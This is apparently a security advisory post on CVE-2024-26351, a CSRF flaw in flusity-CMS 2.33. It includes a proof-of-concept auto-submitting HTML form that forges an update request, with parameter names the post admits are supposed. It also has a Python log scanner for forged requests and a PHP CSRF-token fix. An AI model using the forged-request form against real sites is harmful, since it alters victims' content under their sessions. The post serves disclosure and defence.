
Introduction

In early 2024, a vulnerability was discovered in the popular open-source content management system flusity-CMS, specifically affecting version 2.33. Labeled as CVE-2024-26351, this issue exposes websites to a Cross-Site Request Forgery (CSRF) attack through the /core/tools/update_place.php component. Let’s break down what this vulnerability is, how attackers might exploit it, and ways you can protect your site.

What Is a CSRF Attack?

A Cross-Site Request Forgery (CSRF) attack tricks an authenticated user into performing actions without their consent. If a website does not properly verify requests, malicious websites can force users’ browsers to submit unwanted actions on their behalf.

The flusity-CMS v2.33 Vulnerability

In flusity-CMS version 2.33, the file /core/tools/update_place.php accepts sensitive actions (such as updates to content or configurations) via HTTP requests. Unfortunately, these requests are not protected by any CSRF token or anti-forgery measure, letting attackers forge them easily.

Why Is This Dangerous?

If users are logged into their CMS admin panel, attackers can lure them to visit a malicious website. The attacker’s site then silently sends a crafted POST or GET request to /core/tools/update_place.php, making unwanted edits or changes—using the user’s valid session!

Exploit Details — Proof of Concept

Here’s how an attacker might leverage CVE-2024-26351:
Suppose /core/tools/update_place.php takes parameters like place_id and new_value to update content.

On a malicious website, the attacker can embed the following HTML form:

```html
<!-- CSRF exploit for flusity-CMS v2.33 -->
<form action="http://target-site.com/core/tools/update_place.php" method="POST" id="csrf_form">
  <input type="hidden" name="place_id" value="1">
  <input type="hidden" name="new_value" value="HackedByCSRF">
</form>
<script>
  document.getElementById('csrf_form').submit();
</script>
```

Are you running flusity-CMS v2.33?

- Does the file /core/tools/update_place.php handle sensitive updates?
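
To check whether forged requests of the kind shown in the proof of concept have already reached the endpoint, the following added example (not from the original post or the flusity-CMS project) scans access-log lines for requests to /core/tools/update_place.php whose Referer is another site or missing. It assumes the Apache/nginx combined log format and the placeholder hostname cms.example.org; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumptions (not from the page): combined log format, and the CMS is
# served from the placeholder hostname below.
SITE_HOSTS = {"cms.example.org"}
TARGET_PATH = "/core/tools/update_place.php"

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "'
)

def referer_host(referer):
    """Lower-cased host of a Referer URL, or '' if absent or malformed."""
    try:
        return (urlsplit(referer).hostname or "").lower()
    except ValueError:
        return ""

def classify(line):
    """None for unrelated lines, else (verdict, ip, timestamp, method, referer)."""
    m = LINE_RE.match(line)
    if not m or m["uri"].split("?", 1)[0] != TARGET_PATH:
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        # Browsers omit Referer for benign reasons too, and the sending
        # page can suppress it: a lead to review, not a verdict.
        verdict = "no-referer"
    elif referer_host(referer) in SITE_HOSTS:
        verdict = "same-site"
    else:
        verdict = "cross-site"  # the trace a forged cross-site request leaves
    return verdict, m["ip"], m["ts"], m["method"], referer

def suspicious(lines):
    """Requests to the endpoint that did not come from the site's own pages."""
    results = (classify(line) for line in lines)
    return [r for r in results if r and r[0] != "same-site"]

# Constructed sample lines (documentation IP ranges and example domains).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Feb/2024:14:20:01 +0000] "POST /core/tools/update_place.php HTTP/1.1" 200 512 "https://cms.example.org/" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Feb/2024:14:31:44 +0000] "POST /core/tools/update_place.php HTTP/1.1" 200 498 "https://unrelated.example.net/page.html" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Feb/2024:14:32:10 +0000] "GET /core/tools/update_place.php?place_id=1 HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Feb/2024:14:33:02 +0000] "GET /index.php HTTP/1.1" 200 2048 "https://unrelated.example.net/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for verdict, ip, ts, method, referer in suspicious(SAMPLE_LOG):
        print(f"{verdict:10} {ts} {ip} {method} referer={referer}")
```

A same-site verdict only means the request was sent from one of the site's own pages; the check is a way to find past forged requests, not a substitute for the token fix.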

References

- CVE Details - CVE-2024-26351
- OWASP: Cross-Site Request Forgery (CSRF)
- flusity-CMS Official GitHub *(No official fix as of publication)*

How To Fix

Short-Term Workaround:
Restrict access to /core/tools/update_place.php via server configuration so only permitted users or IP addresses can submit requests.

Proper Fix:

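```php
<?php
// Generate Token (once per session, on the page that renders the form)
session_start();
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
?>
<!-- Inside the form that posts to update_place.php -->
<input type="hidden" name="csrf_token" value="<?= htmlspecialchars($_SESSION['csrf_token']) ?>">

<?php
// Validate Token Before Processing POST (at the top of update_place.php)
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $sent = $_POST['csrf_token'] ?? '';
    // Reject a missing session token as well, so an empty value never matches
    if (!is_string($sent) || empty($_SESSION['csrf_token'])
        || !hash_equals($_SESSION['csrf_token'], $sent)) {
        die('Invalid CSRF token.');
    }
}
```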

Conclusion

CSRF vulnerabilities like CVE-2024-26351 are dangerous because they exploit the trust a site places in a user’s browser. For website admins using flusity-CMS v2.33, it’s important to mitigate the issue as soon as possible, either by applying the fixes above or upgrading when a patch becomes available.

Stay informed and keep your CMS secure!

If you found this useful or have questions, don’t hesitate to comment below or check the original CVE-2024-26351 entry for updates.

Timeline

Published on: 02/22/2024 14:15:47 UTC
Last modified on: 11/01/2024 19:35:19 UTC